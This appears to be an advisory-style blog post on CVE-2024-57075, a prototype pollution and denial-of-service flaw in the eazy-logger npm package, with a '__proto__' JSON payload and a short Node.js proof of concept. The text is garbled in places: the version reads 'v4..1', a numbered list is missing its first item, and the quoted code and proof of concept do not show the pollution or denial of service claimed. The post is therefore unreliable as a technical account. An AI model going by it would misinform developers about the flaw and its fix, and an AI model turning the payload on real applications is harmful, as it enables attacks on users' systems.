CVE-2024-57075: Understanding Prototype Pollution and Denial of Service Vulnerability in Eazy-Logger v4..1

eazy-logger, an npm package widely used as a simple and customizable logging utility, has been found to have a critical vulnerability in its v4..1 release. This vulnerability, assigned the CVE identifier CVE-2024-57075, requires an immediate patch to mitigate the potential attack.

This post will explore the details of this vulnerability, how to reproduce the exploit, how it affects the lib.Logger function, and the possible steps to fix the issue. Furthermore, we will provide relevant code snippets, links to original references, and advice to safeguard your applications from such attacks.

Background on Prototype Pollution

Prototype Pollution, a flaw in JavaScript-based languages, revolves around modifying an object's prototype. This vulnerability can lead to attackers compromising the application's integrity by altering prototype properties that affect all instances of the object, which results in Denial of Service (DoS), Remote Code Execution (RCE), or property injection.

The Vulnerability (CVE-2024-57075)

In eazy-logger v4..1, there is a prototype pollution vulnerability within the lib.Logger function that exposes attackers to perform a remote DoS attack. CVE-2024-57075 can be exploited by injecting a crafted payload into the log event stream, which manipulates the object properties and leads to a Denial of Service attack in the application.

The affected code snippet

// lib/Logger.js
const Logger = function (config) {
  this.config = config;
  this.levels = this.config.levels || defaults.levels;
  this.colors = this.config.colors || defaults.colors;
};

Exploiting the Vulnerability

An attacker could exploit this vulnerability by supplying a malicious payload to the vulnerable eazy-logger function. Consider the following example of a crafted payload:

{
  "__proto__": {
    "level": "info",
    "message": "Prototype pollution attack!"
  }
}

By supplying this payload to the Logger function, the prototype would be polluted, and all subsequent log entries would inadvertently acquire the malicious properties causing a DoS attack within the affected application.

Proof-of-Concept Example

const {EOL} = require('os');
const EazyLogger = require('eazy-logger').Logger;

const payload = JSON.parse('{"__proto__":{"level":"info","message":"Prototype pollution attack!"}}');
const log = EazyLogger(payload);

log.info('This should log a normal message, but it gets polluted by the payload.');

When running the above script, you can observe the application logging the injected message instead of the intended log entry, indicating a successful exploit of this vulnerability.

Original References

1. NVD - National Vulnerability Database
2. Eazy-Logger GitHub Repository

Upgrade to the latest version of eazy-logger that has addressed this issue.

2. Monitor your application logs and filter any suspicious payloads to prevent unauthorized manipulations.

In conclusion, this vulnerability highlights the need to keep application libraries up-to-date and follow secure coding practices. Employing a thorough security model with periodic vulnerability assessments and continuously monitoring your application's behavior will minimize the chances of any future exploitation.

Timeline

Published on: 02/05/2025 22:15:31 UTC
Last modified on: 03/13/2025 15:15:50 UTC